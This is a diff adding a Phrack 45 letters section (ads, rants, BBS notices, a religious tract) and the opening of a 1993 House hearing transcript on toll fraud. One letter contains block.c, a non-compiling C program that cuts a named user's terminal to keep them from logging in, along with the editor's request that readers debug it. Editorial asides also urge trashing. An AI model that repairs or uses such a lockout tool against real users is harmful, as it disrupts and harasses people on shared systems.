+and I will be able to respond through the help of people over
+the phone.
+
+I would like to thank Erik Bloodaxe for letting me use Phrack
+to tell everybody farewell. I hope nothing's changed when I get
+back, and I will be back. I'll just have to keep my nose a little
+cleaner when I come back from my sabbatical.
+
+It's been great, and I'll see all of you hopefully in about
+a year or so.
+
+
+[Byron did get to go to HoHoCon, but shortly thereafter had to fly to
+ Pennsylvania to enter Boot Camp.
+
+ Byron's Address in prison is:
+
+        J.C.C.
+        Byron York  60177-079
+        P.O. Box 1000
+        Lewisburg, PA 17837-1000
+
+ Drop him a note.  It really makes the day go by a little easier in
+ a world of bloody shank wars with the Texas Syndicate.  Jail sucks.]
+
+------------------------------------------------------------------------------
+
+[Ad for Jolly Roger T-Shirt]
+
+>[God bless the free enterprise system!
+> God bless capitalism!
+> God bless America!]
+
+Well, I'm an atheist and natural law objectivist, so I'll cheer right along
+with you on the capitalism part! Capitalism is the only MORALLY PROPER
+system because it's the only system (or lack thereof) that doesn't treat
+people as slaves!
+
+
+[editorial]
+
+>This is going to piss people off, but hell, that's the point of having
+>an editorial, eh?
+
+I, for one, fucking loved it.
+
+>Granted, Holland has a notoriously permissive and open society; and
+>indeed, Europe in general is far more laid back than the States, but
+>even many in the US hold these ideals close to heart.
+
+Europe also has a great police state tradition, not to mention the common
+and prevailing attitude that while sex and drugs and rock and roll are okay,
+making money (creating wealth) is a far more heinous crime.
+
+>...The major cons in America (HoHo, Scon) really don't charge.
+>They "ask" for donations.  Sure, you might get a nasty look if
+>you don't cough up five or ten bucks, but hell, everyone does.  They
+>WANT to.  A good time is worth a handful of change.  And there isn't
+>some awesome requirement just to get in the damn door.  Besides, losses
+>can always be made up by selling a plethora of crap such as t-shirts and
+>videos, which everyone always wants to buy.  (Hardware costs.  :) )
+
+VOLUNTARY donations! (The Supreme Court says "our system of taxation is
+based on VOLUNTARY COMPLIANCE"...) There's a vast and monstrous difference
+between voluntary and involuntary - it's that nasty "free will thing"!
+
+>Then there was Phrack.  Always free to the community.  Always available
+>for everyone's enjoyment.  Asking only that Corporate types pay a
+>registration fee of a hundred dollars just to keep them honest.  (They
+>aren't.)  Knowing full well that they are stealing it, sometimes quite
+>brazenly.  Resting quietly, knowing that they are just as unethical as
+>they ever claimed us to be.
+
+I also love your registration requirements. Being able to claim ownership
+of property, intellectual or otherwise, means you dictate the terms and
+conditions of its use. Corporate lawyers must have had coronaries upon
+first sight. Only difficulty is, your ISSN number and copyright data
+are prima facie evidence that you contracted away rights in exchange for
+privilege from the state, revocable whenever the state feels like it
+(copyright falls under admiralty jurisdiction, not common law). You've
+formed an "organization" - your registration form recognizes the fact
+that "corporations, organizations and other artificial persons" have
+a lesser STATUS before the law than NATURAL INDIVIDUALS - just be who
+you are!
+
+>Let me tell you something.  Information does not want to be free, my
+>friends.  Free neither from its restraints nor in terms of dollar value.
+>Information is a commodity like anything else.  More valuable than the
+>rarest element, it BEGS to be hoarded and priced.  Anyone who gives
+>something away for nothing is a moron.  (I am indeed stupid.)  I can't
+>fault anyone for charging as long as they don't try to rationalize their
+>reasoning behind a facade of excuses, all the while shouting "Information
+>Wants to be Free!"
+
+AMEN, from the highest fucking rooftops! You're not stupid, you're doing it
+by CHOICE. You're VOLUNTARILY doing it. Free people don't NEED laws that
+force decisions upon them - they do what needs to be done!
+
+>Trade secrets don't want to be free, marketing projections don't want to
+>be free, formulas don't want to be free, troop placements don't want to
+>be free, CAD designs do not want to be free, corporate financial
+>information doesn't want to be free, my credit report sure as hell
+>doesn't want to be free!
+
+YES! YES! I HAVE WAITED FOR YEARS FOR THIS MOMENT!
+
+[tale of the Little Red Hen]
+
+Amen again!
+
+This whole issue, in fact, had many great things, which I'll continue
+to reply to here...
+
+[ ... 10K of commentary removed ... ]
+
+Finally...remember how crazy people got in the years just before the turn of
+the first millennium (990-1000 A.D.)? It's gonna be even MORE interesting
+this time around!
+
+Here's to Phrack... may you last into the 21st century! (May we ALL be so
+lucky...)
+
+
+[Man, that was one of the coolest letters we've ever gotten (and definitely
+ the longest.  I have to tell you, it does my heart good to know that we
+ are indeed appreciated by some of you.    We will continue to do so until
+ as long as humanly (or inhumanly, with my schedule) possible.]
+
+------------------------------------------------------------------------------
+
+A document I found in trash......
+
+What's Next  1993 Revenue  1993 Operating
+   in billions  Cash Flow in billions
+
+AMERITECH  $11.71   $4.72
+Pursue in-region strategy. Push regulators for entry into long distance
+business.
+
+BELL ATLANTIC  $12.99   $5.34
+Proceed with interactive networks linking 1.2 million homes by
+year-end 1995. Seek local cable partners.
+
+BELLSOUTH  $15.88   $6.64
+Decide whether to invest $500 million of QVC, despite loss in
+Paramount fight.
+
+NYNEX   $13.4   $5.06
+Proceed with $1.2 billion investment in Viacom.  Build new networks
+in Northeast, but only if it wins new regulatory freedom.
+
+PACTEL   $10   $4.08
+Pursue in-region strategy for new personal communication services.
+
+SOUTHWESTERN BELL $10.69   $4.08
+Pursue cable relationship with Cox Enterprises Inc.; complete
+$552 million acquisition of upstate New York cellular franchises.
+
+USWEST   $10.29   $4.45
+Offer new phone services in New York cable systems; may pursue
+Cablevision Systems Corp. with partner Time Warner.
+
+Total   $84.98   $34.53
+
+Gee whiz now I really sympathize with the phone company about their petty
+loss on fraud.
+
+[Fuck.  And you mean to tell me THEY can't afford a measly 100 bucks
+ registration fee?  Maybe them thought it was 100 Million bucks.  But
+ even then it's well within their grasp.  Hmm...maybe the fee should go up.]
+
+------------------------------------------------------------------------------
+
+
+I would like to pay respects to a fellow user on my system who was killed in
+the recent helicopter crash near San Jose, CA.  "Rotor" was a user-friendly
+d00d who would always talk your ear off about helicopter technician work.  It
+is a great loss to our local community.
+
+ Call the CybernaughtG@twAy.  el33t x10^8  (408) 911-3974   Login <guest>
+           --------------================---------------
+
+[I want to say I'm very sorry about your friend.  I know exactly how
+ you must feel.]
+
+------------------------------------------------------------------------------
+
+
+For immediate rebroadcast::::::::::::::::::::::
+
+*********************************************************************
+                      The SenseReal Foundation
+  The SenseReal Foundation is a non-profit, non-organization dedicated
+to the preservation and free distribution of information and the
+promotion of the Amiga computer.  In this ever increasing police state
+we live in the Amiga computer is a beacon of hope.  If you buy into Big
+Blue you are buying into Big Brother.  The information revolution is
+happening now.  More and more our liberty will depend on the acquisition,
+processing, dissemination, and control of knowledge.  We are heading into
+an era when there's going to be enormous pressure to prevent further
+development of certain kinds of knowledge.  This situation has created
+the need for the......
+
+     SenseReal Archives
+
+  Send all kinds of information to the SenseReal archives for
+preservation and rebroadcast.  Send newsletters, magazines, books, 'zines,
+tapes, CDs, or anything at all to the address below.  Not only will
+your contribution be deeply appreciated, it will be preserved and
+made available to present and future generations.  As more powerful, small,
+cheap technologies are available to the masses it may increase conflict
+between the current power structure and those now considered to be in
+the underground.  Civilization as we know it is racing towards the brink,
+and hopefully we will survive through this current cycle, but we do
+not know what will face us then.  Sending The SenseReal Foundation your
+material is a good way of expanding the knowledge of many people.  When
+appropriate, information will be made available on the SenseReal BBS.....
+
+The Haunted Mansion BBS (404)516-4732 Fri-Sun 6pm-6am
+
+  Call this number anytime.  Primary hours are Fri-Sun 6PM-6AM but you
+never know when the board may be up.  If it is not online when you call, call
+back in 3-5 minutes and perhaps it will be.  It is primarily an Amiga board
+but also features message areas and a text file area that will be of
+interest to all.  Send postcards, bizarre items, money, and anything else
+to:
+                                          Call THE HAUNTED MANSION BBS
+   THE SENSEREAL FOUNDATION               (404)516-4732   Fri-Sun 6PM-6AM
+   6595-G ROSWELL RD. Suite #206          Or contact via the Internet:
+   ATLANTA,GA 30328                       Green_Ghost@neonate.atl.ga.us
+
+All information and anything sent will be kept secret forever upon request.
+
+
+-- Via DLG Pro v1.0
+
+[Uh, gee, little did I realize that when I bought my Amiga 500, I was joining
+ such a sacred brotherhood.  I wonder what my employers would think.]
+
+------------------------------------------------------------------------------
+
+  So, there I am in New York City last night. We're hanging out
+(figuratively speaking) at The Vault, where various fetishists
+get together to explore the limits of aberrant human sexuality.
+All in all, a rather interesting place. The $30 cover was a little
+steep, but I would still highly recommend it. Now for my point.
+
+  I was standing around watching two dominatrix abuse some
+naked, prostrate wretch when one of them started walking around
+giving out business cards to anyone who admitted to having a
+computer and an Internet feed (these are dominatrix on the
+cutting edge of technology, I might add). The card reads thus:
+
+CYBEROTICA Online
+Ride the wave of erotic communication into the 21st century, as
+CYBEROTICA Online(tm) becomes your point-of-penetration into
+Cyberspace. Transport yourself into a universe of wild fantasy-
+and-fetish images, tales, and intimate, anonymous interaction with
+erotic-video stars, industry insiders, and thousands of open-minded
+people around the world.
+Experience CYBEROTICA Online for FREE as our VIP guest while we
+perfect the system, and in exchange for your valued input you'll
+receive added VIP privileges as we grow! Contact us today for
+your free Infopac and Startup Software, before this opportunity
+ends. 212.587.0197 fax 587.0513
+80 n moore st., tribecca, ny 10013  email: steffani@echonyc.com
+
+
+  I am sure this is just a teaser to get people on-line and then
+start charging them, but I found it pretty interesting.
+
+---tabas
+
+NOTE: I have no knowledge of or affiliation with the above
+organization and the posting of this message does not
+constitute an endorsement of perversion.
+
+[Well, hell...now I know where to go next month when I'm back in NYC.
+ I wish I would have know about this place last time...the only places
+ I could find for even semi-serious sleeze was in Times Square, and I know
+ that was way too tame and trendy to be IT.  Now I know.]
+
+------------------------------------------------------------------------------
+
+The earthquake in Los Angeles, California, the flood in Europe, the seemingly
+unstoppable war in the former Yugoslavia, the devastating fires in Australia,
+the flood in the Midwest of the United States of America, the devastating fires
+near Los Angeles, California, the rapid and appalling increase in violence in
+cities, towns, villages all over the world, the famines, the diseases, the rapid
+decline of the family unit, and the destructive earthquake in India (in 1993)
+are signs that this world's history is coming to a climax. The human race
+has trampled on God's Constitution, as given in Exodus 20:1-17 (King James
+Version Bible), and Jesus is coming to set things right. These rapidly
+accelerating signs are an indication that Jesus is coming soon (Matthew 24).
+
+God's Holy Spirit is gradually withdrawing its protection from the earth
+and the devastating events you see are demonstrations of Satan's power. All
+those who are not guarded by God are in danger of forever losing eternal life.
+
+If you want to know what's about to happen, please study the books of Daniel
+and Revelation which are located in God's Word, the Bible.  They are not
+sealed or closed books. They can and must be understood by all. Every word
+in the Bible from Genesis to Revelation is true. The Bible and the Bible only
+must be your guide.
+
+When God's Law (the Constitution for the Universe) is consistently ignored,
+disregarded, changed, and questioned, He permits certain events to occur to
+wake us up.  I would urge all, wherever you are and regardless of the
+circumstances, to directly call on Jesus and ask Him to intervene in your life.
+Jesus who created this planet and every living creature in it and on it, died
+on the cross, was raised from the dead by God the Father, and is now in Heaven
+interceding for you. Jesus is the only One who can rescue us from the slavery,
+misery, and death Satan is causing us.
+
+For reference I'm including God's Constitution as given in the King James
+Version Bible. Please note that when God says the seventh day, he means Sabbath
+(the 7th day of the week) not Sunday (1st day of the week).
+
+Commandment #1:  Exodus 20:1-3 (KJV)  And God
+                 spake all these words, saying, I am
+                 the LORD thy God, which have brought
+                 thee out of the land of Egypt, out
+                 of the house of bondage. Thou shalt have
+                 no other gods before me.
+
+Commandment #2:  Exodus 20:4-6 (KJV) Thou shalt not make
+                 unto thee any graven image, or any
+                 likeness of any thing that is in heaven
+                 above, or that is in the earth beneath,
+                 or that is in the water under the earth.
+                 And shewing mercy unto thousands of them
+                 that love me, and keep my commandments.
+
+Commandment #3:  Exodus 20:7 (KJV) Thou shalt not take
+                 the name of the LORD thy God in vain;
+                 for the LORD will not hold him
+                 guiltless that taketh his name in vain.
+
+Commandment #4:  Exodus 20:8-11 (KJV) Remember the sabbath
+                 day, to keep it holy. Six days shalt thou
+                 labour, and do all thy work: But the
+                 seventh day is the sabbath of the LORD
+                 thy God: in it thou shalt not do any
+                 work, thou, nor thy son, nor thy daughter,
+                 thy manservant, nor thy maidservant, nor
+                 thy cattle, nor thy stranger that is
+                 within thy gates: For in six days the
+                 LORD made heaven and earth, the sea, and
+                 all that in them is, and rested the seventh
+                 day: wherefore the LORD blessed the sabbath
+                 day, and hallowed it.
+
+Commandment #5:  Exodus 20:12 (KJV) Honour thy father and thy
+                 mother: that thy days may be long upon the
+                 land which the LORD thy God giveth thee.
+
+Commandment #6:  Exodus 20:13 (KJV) Thou shalt not kill.
+
+Commandment #7:  Exodus 20:14 (KJV) Thou shalt not commit
+                 adultery.
+
+Commandment #8:  Exodus 20:15 (KJV) Thou shalt not steal.
+
+Commandment #9:  Exodus 20:16 (KJV) Thou shalt not bear
+                 false witness against thy neighbour.
+
+Commandment #10: Exodus 20:17 (KJV) Thou shalt not covet
+                 thy neighbour's house, thou shalt not
+                 covet thy neighbour's wife, nor his
+                 manservant, nor his maidservant, nor
+                 his ox, nor his ass, nor any thing that
+                 is thy neighbour's.
+
+I also recommend that the following books be obtained and closely studied:
+
+         The Great Controversy
+         By Ellen G. White
+         Review and Herald Publishing Association
+         Hagerstown, MD 21740
+
+  The Desire of the Ages
+  By Ellen G. White
+  Review and Herald Publishing Association
+  Hagerstown, MD 21740
+
+         Patriarchs and Prophets
+         By Ellen G. White
+         Review and Hearld Publishing Association
+         Hagerstown, MD 21740
+
+  Daniel and the Revelation
+         By Uriah Smith
+         Review and Herald Publishing Association
+         Hagerstown, MD 21740
+
+[Praise the Lord & Pass the Ammunition!]
+
+------------------------------------------------------------------------------
+
+
+  Big Brother Inside Logo
+A parody of the Intel's Logo modified for the Clipper Chip is now available
+for use for stickers, posters, brochures etc.
+
+The Big Brother Inside graphic files are now available at the CPSR
+Internet Archive - ftp/gopher cpsr.org /cpsr/privacy/crypto/clipper
+
+big_brother_inside_sticker.ps (postscript-scale to fit your project)
+big_brother_inside_logo.gif (Color GIF - good startup/background screen)
+big_brother_inside_picts_info.txt (Info on the files)
+
+The files have also been uploaded to America Online in the Mac Telecom and
+Graphic Arts folders.
+
+big_brother_inside_sticker.ps is a generic postscript file, created in
+CorelDraw. The postscript image lies landscape on the page, and consists
+of the intel-logo's ``swoosh'' and crayon-like lettering on the inside.
+
+This design was originally created for the sticker project: the image was
+screened onto transparent stickers 1" square for the purpose of applying
+them to future clipper-chip products. (cdodhner@indirect.com was in charge
+of that project; as far as I know he's still distributing them for a small
+donation to cover printing & mailing costs).
+
+The design was created by Matt Thomlinson <phantom@u.washington.edu>
+
+[The stickers I have made a HUGE hit among the various "select targets"
+ at COMDEX.  Get yours and join in on the fun.  There are a world of
+ mass merchant distributors waiting to be "tagged."  Sounds like the
+ SenseReal foundation would love a handful of these for those pesky
+ Intel boxes.]
+
+------------------------------------------------------------------------------
+
+HI,
+
+1st I want to thank you for dedicating your space to the silliness
+and foolishness that comes with anything Sara Gordon related.
+
+I think I should have gotten the last word but, who wants to turn this
+into a public feud, specially with a demented middle aged woman.
+
+Well, Thanks anyway for including the article, I have found people in
+the underground who believe what I am saying, as I have no monetary
+interest in this unlike Mrs. Gordon.
+
+Kohntark.
+
+[Well Kohntark, looks like you DID get the last word.  No, wait, I did.]
+
+------------------------------------------------------------------------------
+
+Hello Chris,
+
+I have a constant battle with some of my friends over who can ruin
+another person's display first.  Well, if I could log them out...
+However, I'm afraid the program doesn't compile.
+
+Thanks for any light you might be able to shed on the matter.
+
+Bye!
+
+
+I get these 3 errors:
+
+"block.c", line 22.17: 1506-030 (S) Identifier open cannot be redeclared.
+"block.c", line 41.18: 1506-045 (S) Undeclared identifier user.
+"block.c", line 48.16: 1506-045 (S) Undeclared identifier W_OK.
+
+
+/* block.c -- prevent a user from logging in
+ * by Shooting Shark
+ * usage : block username [&]
+ * I suggest you run this in background.
+ */
+
+#include <stdio.h>
+#include <utmp.h>
+#include <ctype.h>
+#include <termio.h>
+#include <fcntl.h>
+
+#define W_OK2
+#define SLEEP5
+#define UTMP"/etc/utmp"
+#define TTY_PRE "/dev/"
+
+main(ac,av)
+int ac;
+char *av[];
+{
+int target, fp, open();
+struct utmpuser;
+struct termio*opts;
+char buf[30], buf2[50];
+
+if (ac != 2) {
+printf("usage : %s username\n",av[0]);
+exit(-1);
+}
+
+
+for (;;) {
+
+if ((fp = open(UTMP,0)) == -1) {
+printf("fatal error!  cannot open %s.\n",UTMP);
+exit(-1);
+}
+
+
+while (read(fp, &user, sizeof user) > 0) {
+if (isprint(user.ut_name[0])) {
+if (!(strcmp(user.ut_name,av[1]))) {
+
+printf("%s is logging in...",user.ut_name);
+sprintf(buf,"%s%s",TTY_PRE,user.ut_line);
+printf("%s\n",buf);
+if (access(buf,W_OK) == -1) {
+printf("failed - program aborting.\n");
+exit(-1);
+}
+else {
+if ((target = open(buf,O_WRONLY)) != EOF) {
+sprintf(buf2,"stty 0 > %s",buf);
+system(buf2);
+printf("killed.\n");
+sleep(10);
+}
+
+} /* else */
+} /* if strcmp */
+} /* if isprint */
+} /* while */
+close(fp);
+
+/*sleep(SLEEP);  */
+
+} /* for */
+
+
+}
+
+[Anyone want to take a crack at this??  Debug it and mail it back to us
+ so we can forward it on...]
+
+
+------------------------------------------------------------------------------
+
+xXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXx
+
+                           IT'S BACK!!!!W$#@$#@$
+
+
+                             _-_-_-_-_-_-_-_-_
+                             (               )
+                              (    B00m    )
+                                (        )
+                 CAU             (__  __)                CAU
+                                  __\/___
+           "We WiLL BloW     /---/|_____|\----\     uP YoUr CaR!"
+                             /CaU-__WuZ__-HeRe\-
+                                (0)       (0)
+
+
+                               fARM R0Ad 666
+
+     *fR666.something.com*     (713)855-0261      *fR666.something.com*
+
+                    CAU-0b/GYN        SySoPs: EighT BaLL
+                  kCf-ThP-Phrack              M.C. Allah
+                Bc0maP-d0S/2-Tone             Drunkfux
+
+
+     ' CAU Home                         ' Bc0maP Couriers Site
+     ' cDc Factory Direct Outlet(kCf)   ' 0b/GYN Member Site
+     ' USENET, InterNet E-Mail(s00n)    ' Hack/Phreak Discussions
+     ' Flashback Software               ' ToneLoc Distribution Site
+     ' 12oo-14.4 bps                    ' Exophasia Submission Site
+     ' 0PhiCiAl PHraCk DiSt Site        ' No Ratios for non dorks
+
+xXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXx
+
+[This is 8-Ball's bbs.  Call it and watch him shoot up.  Word.]
+
+------------------------------------------------------------------------------
+
+
+   Hackers, phone phreaks, techno-anarchists, cyberpunks, etc.
+
+   * * * THE OFFICIAL U.K. '2600 Magazine' MONTHLY MEETINGS. * * *
+
+   Meetings are held on the first Friday of each month.
+
+   All those interested in attending will be required to meet at
+   the Trocadero shopping centre, which is a one minute walk from
+   the Picadilly Circus underground station, London.
+
+   The meeting point is actually inside the shopping centre, next
+   to the Virtual Reality machines located on the bottom floor.
+
+   Anyone interested in taking part should assemble next to these
+   machines between 7.00pm and 8.00pm.
+
+   Those who attend will then travel by tube train to a 'unknown'
+   location for computer underground discussion, information
+   exchange, etc.
+
+   For more information, phone 'Damian' on 071-262-3042, or send
+   email to 'uabbs@works.com'
+
+   Check page '46' of your latest '2600 Magazine' for details of
+   other meeting locations, etc.
+
+   2600 Magazine
+   PO Box 752
+   Middle Island
+   NY 11953
+   U.S.A.
+
+   Tel: +1-516-751-2600 (24 hour answering system)
+   Fax: +1-516-751-2608
+
+--------------------------------------------------------------------------
+
+This bulletin was created by 'Phantasm' on Tuesday 08-Feb-94 at 11:51pm.
+
+[You brits:  GO TO THESE MEETINGS!  And go trashing afterwards!  And
+ raise some hell.  Throw caution to the wind.  Be loud and obnoxious.
+ Get thrown out.  (Just pretend you are Americans.  It works every time.) ]
+
+------------------------------------------------------------------------------
+
+Hello,
+
+I run a board here in the UK known as Unauthorised Access.  We have been
+online since 1990 (the year of our anti-hacking law's approval) and the
+system is now the largest computer underground board in the U.K. (2,000+
+quality files and growing each day)
+
+I also attended the HEU congress in Holland but although I spoke with
+Eric Corley (2600) and BillSF (Hack-Tic), I did not know where to find
+you.  I expect you dissappeared off to Amsterdam like so many of the
+other visitors to Holland.
+
+Anyway, I noticed in your last issue (44) that you seem to have quite a
+few readers in the United Kingdom.  I would like to tell you about my
+system here in the UK.  (Please include this advert in your next issue
+of PHRACK)  Thanks!
+
+Unauthorised Access
+Online 10.00pm-7.00am GMT
+Established 1990
+Britain's largest computer underground system
+30+ message special interest groups
+2,000+ underground file online
+c64/Amiga/IBM/ h/p util support
+Running at 3oo/12oo/24oo/96oo HST
+tel: +[44] 636-708063
+
+SysOp: Phantasm
+
+----------------------------------------
+
+[I always dig Overseas BBSes.  Unfortunately I couldn't get a strong line
+ when I've tried to call.  Geez, you would think that in this age of
+ fiber, I may be able to connect...but noooooo.  :)  ]
+
+------------------------------------------------------------------------------
+
+   New TimeWasters T-shirts !
+
+Do you know the feeling ? You're behind your terminal for hours,
+browsing the directories of your school's UNIX system. Instead of
+holes, bugs and bad file permissions you find tripwire, TCPwrapper and
+s/key. You run a file with a s-bit and immediately you get a mail from
+the system admin asking what you are doing. In other words, no chance
+to ever become a good hacker there.
+
+Now you have the chance to at least pretend to be an eleet
+hacker. The Dutch hacking fanatics The TimeWasters have released
+the third version of their cool 'hacker' T-shirt. Because
+the previous versions were too limited (20 and 25 shirts) we
+printed no less than 200 shirts this time.
+
+Of course you want to know, what does it look like ?
+On the front, a TimeWasters logo in color. Below that a picture
+of two hacking dudes, hanging behind their equipment, also
+featuring a stack of phracks, pizza boxes, beer, kodez, and
+various computer-related stuff with a 'No WsWietse' sticker.
+On the back, the original TimeWasters logo with the broken
+clock. Below it, four original and dead funny real quotes
+featuring the art of Time Wasting.
+
+Wearing this shirt can only provoke one reaction; WOW !
+Imagine going up to the helpdesk wearing this shirt and
+keeping a straight face while asking a security question !
+
+And for just $2 more you'll get a pair of sunglasses with
+the text 'TimeWasters' on them !
+
+To order:
+Send $20 or $22 to
+ TimeWasters
+ Postbus 402
+ 5611 AK Eindhoven
+ The Netherlands, Europe
+This includes shipping. Please allow some time for delivery. If you
+are in Holland, don't send US$, email the address below for the
+price in guilders and our 'postbank' number.
+
+For more information: email to:
+- timewasters-request@win.tue.nl with subject: T-SHIRT for a txtfile
+  with more info.
+- rob@hacktic.nl or gigawalt@win.tue.nl for questions.
+
+[I've got one Time Wasters shirt...Now I'm gonna have to get another.
+ Wonder if they'll trade...I know this guy who makes some damn cool
+ shirts... but the glasses are the clincher.  I'm ordering now.]
+
+------------------------------------------------------------------------------
diff --git a/phrack45/20.txt b/phrack45/20.txt
new file mode 100644
index 0000000..14955bf
--- /dev/null
+++ b/phrack45/20.txt
@@ -0,0 +1,1211 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Five, File 20 of 28
+
+****************************************************************************
+
+                    The Senator Markey Hearing Transcripts
+
+[To obtain your own copy of this hearing and the other related ones,
+ contact the U.S. Government Printing Office (202-512-0000) and ask
+ for Serial No. 103-53, known as "Hearings Before The Subcommittee
+ on Telecommunications and Finance of the Committee on Energy and
+ Commerce, House of Representatives, One Hundred Third Congress,
+ First Session, April 29 and June 9, 1993".]
+
+----------------------------------------------------------------------
+
+     Mr. MARKEY. If you could close the door, please, we could move
+on to this very important panel. It consists of Mr. Donald Delaney,
+who is a senior investigator for the New York State Police. Mr.
+Delaney has instructed telecommunications fraud at the Federal Law
+Enforcement Training Center and has published chapters on computer
+crime and telecommunications fraud. Dr. Peter Tippett is an expert
+in computer viruses and is the director of security products for
+Symantec Corporation in California. Mr. John J. Haugh is chairman
+of Telecommunications Advisors Incorporated, a telecommunications
+consulting firm in Portland, Oreg., specializing in network
+security issues. Dr. Haugh is the editor and principal author of
+two volumes entitled "Toll Fraud" and "Telabuse" in a newsletter
+entitled "Telecom and Network Security Review." Mr. Emmanuel
+Goldstein is the editor-in-chief of "2600: The Hacker Quarterly."
+Mr. Goldstein also hosts a weekly radio program in New York called
+"Off The Hook." Mr. Michael Guidry is chairman and founder of the
+Guidry Group, a security consulting firm specializing in
+telecommunications issues. The Guidry Group works extensively with
+the cellular industry in its fight against cellular fraud.
+     We will begin with you, Mr. Delaney, if we could. You each
+have 5 minutes. We will be monitoring that. Please try to abide by
+the limitation. Whenever you are ready, please begin.
+     STATEMENTS OF DONALD P. DELANEY, SENIOR INVESTIGATOR, NEW YORK
+STATE POLICE; JOHN J. HAUGH, CHAIRMAN, TELECOMMUNICATIONS ADVISORS;
+EMMANUEL GOLDSTEIN, PUBLISHER, 2600 MAGAZINE; PETER S. TIPPETT,
+DIRECTOR, SECURITY AND ENTERPRISE PRODUCTS, SYMANTEC CORP.; AND
+MICHAEL A. GUIDRY, CHIEF EXECUTIVE OFFICER, THE GUIDRY GROUP
+     Mr. DELANEY. Thank you, Mr. Chairman, for the invitation to
+testify today.
+     As a senior investigator with the New York State Police, I
+have spent more than 3 years investigating computer crime and
+telecommunications fraud. I have executed more than 30 search
+warrants and arrested more than 30 individuals responsible for the
+entire spectrum of crime in this area.
+     I authored two chapters in the "Civil and Criminal
+Investigating Handbook" published by McGraw Hill entitled
+"Investigating Computer Crime and Investigating Telecommunications
+Fraud." Periodically I teach a 4-hour block instruction on
+telecommunications fraud at the Federal Law Enforcement Training
+Center in Georgia.
+     Although I have arrested some infamous teenagers, such as
+Phiber Optic, ZOD, and Kong, in some cases the investigations were
+actually conducted by the United States Secret Service. Because
+Federal law designates a juvenile as one less than 18 years of age
+and the Federal system has no means of prosecuting a juvenile,
+malicious hackers, predominately between 13 and 17 years of age,
+are either left unprosecuted or turned over to local law
+enforcement. In some cases, local law enforcement were either
+untrained or unwilling to investigate the high-tech crime.
+     In examining telecommunications security, one first realizes
+that all telecommunications is controlled by computers. Computer
+criminals abuse these systems not only for free service but for a
+variety of crimes ranging from harassment to grand larceny and
+illegal wiretapping. Corporate and Government espionage rely on the
+user-friendly networks which connect universities, military
+institutions, Government offices, corporate research and
+development computers. Information theft is common from those
+companies which hold our credit histories. Their lack of security
+endanger each of us, but they are not held accountable.
+     One activity which has had a financial impact on everyone
+present is the proliferation of call sell operations. Using a
+variety of methods, such as rechipped cellular telephones,
+compromised PBX remote access units, or a combination of cellular
+phone and international conference lines, the entrepreneur deprives
+the telephone companies of hundreds of millions of dollars each
+year. These losses are passed on to each of us as higher rates.
+     The horrible PBX problem exists because a few dozen finger
+hackers crack the codes and disseminate them to those who control
+the pay phones. The major long distance carriers each have the
+ability to monitor their 800 service lines for sudden peaks in use.
+A concerted effort should be made by the long distance carriers to
+identify the finger hackers, have the local telephone companies
+monitor the necessary dialed number recorders, and provide local
+law enforcement with timely affidavits. Those we have arrested for
+finger hacking the PBX's have not gone back into this type of
+activity or crime.
+     The New York State Police have four newly trained
+investigators assigned to investigate telecommunications fraud in
+New York City alone. One new program sponsored by AT&T is
+responsible for having trained police officers from over 75
+departments about this growing blight in New York State alone.
+     Publications, such as "2600," which teach subscribers how to
+commit telecommunications crime are protected by the First
+Amendment, but disseminating pornography to minors is illegal. In
+that many of the phone freaks are juveniles, I believe legislation
+banning the dissemination to juveniles of manuals on how to commit
+crime would be appropriate.
+     From a law enforcement perspective, I applaud the proposed
+Clipper chip encryption standard which affords individuals
+protection of privacy yet enables law enforcement to conduct
+necessary court-ordered wiretaps, and with respect to what was
+being said in the previous conversation, last year there were over
+900 court-ordered wiretaps in the United States responsible for the
+seizure of tons of illicit drugs coming into this country, solving
+homicides, rapes, kidnappings. If we went to an encryption standard
+without the ability for law enforcement to do something about it,
+we would have havoc in the United States -- my personal opinion.
+     In New York State an individual becomes an adult at 16 years
+old and can be prosecuted as such, but if a crime being
+investigated is a Federal violation he must be 18 years of age to
+be prosecuted. Even in New York State juveniles can be adjudicated
+and given relevant punishment, such as community service.
+     I believe that funding law enforcement education programs
+regarding high-tech crime investigations, as exists at the Federal
+Law Enforcement Training Center's Financial Frauds Institute, is
+one of the best tools our Government has to protect its people with
+regard to law enforcement.
+     Thank you.
+     Mr. WYDEN [presiding]. Thank you very much for a very helpful
+presentation.
+     Let us go next to Mr. Haugh.
+     We welcome you. It is a pleasure to have an Oregonian,
+particularly an Oregonian who has done so much in this field, with
+the subcommittee today. I also want to thank Chairman Markey and
+his excellent staff for all their efforts to make your attendance
+possible today.
+     So, Mr. Haugh, we welcome you, and I know the chairman is
+going to be back here in just a moment.
+     STATEMENT OF JOHN J. HAUGH
+     Mr. HAUGH. Thank you, Mr. Wyden.
+     We expended some 9,000 hours, 11 different people, researching
+the problem of toll fraud, penetrating telecommunications systems,
+and then stealing long distance, leading up to the publication of
+our two-volume reference work in mid-1992. We have since spent
+about 5,000 additional hours continuing to monitor the problem, and
+we come to the table with a unique perspective because we are
+vender, carrier, and user independent.
+     In the prior panel, the distinguished gentleman from AT&T, for
+whom I have a lot of personal respect, made the comment that the
+public justifiably is confident that the national wire network is
+secure and that the problem is wireless. With all due respect, that
+is a laudable goal, but as far as what is going on today, just
+practical reality, that comment is simply incorrect, and if the
+public truly is confident that the wired network is secure, that
+confidence is grossly misplaced.
+     We believe 35,000 users will become victimized by toll fraud
+this year, 1993. We believe the national problem totals somewhere
+between $4 and $5 billion. It is a very serious national problem.
+We commend the chairman and this committee for continuing to
+attempt to draw public attention and focus on the problem.
+     The good news, as we see it, over the last 3 years is that the
+severity of losses has decreased. There is better monitoring,
+particularly on the part of the long distance carriers, there is
+more awareness on the part of users who are being more careful
+about monitoring and managing their own systems, as a result of
+which the severity of loss is decreasing. That is the good news.
+     The bad news is that the frequency is greatly increasing, so
+while severity is decreasing, frequency is increasing, and I will
+give you some examples. In 1991 we studied the problem from 1988 to
+1991 and concluded that the average toll fraud loss was $168,000.
+We did a national survey from November of last year to March of
+this year, and the average loss was $125,000, although it was
+retrospective. Today we think the average loss is $30,000 to
+$60,000, which shows a rather dramatic decline.
+     The problem is, as the long distance thieves, sometimes called
+hackers, are rooted out of one system, one user system, they
+immediately hop into another one. So severity is dropping, but
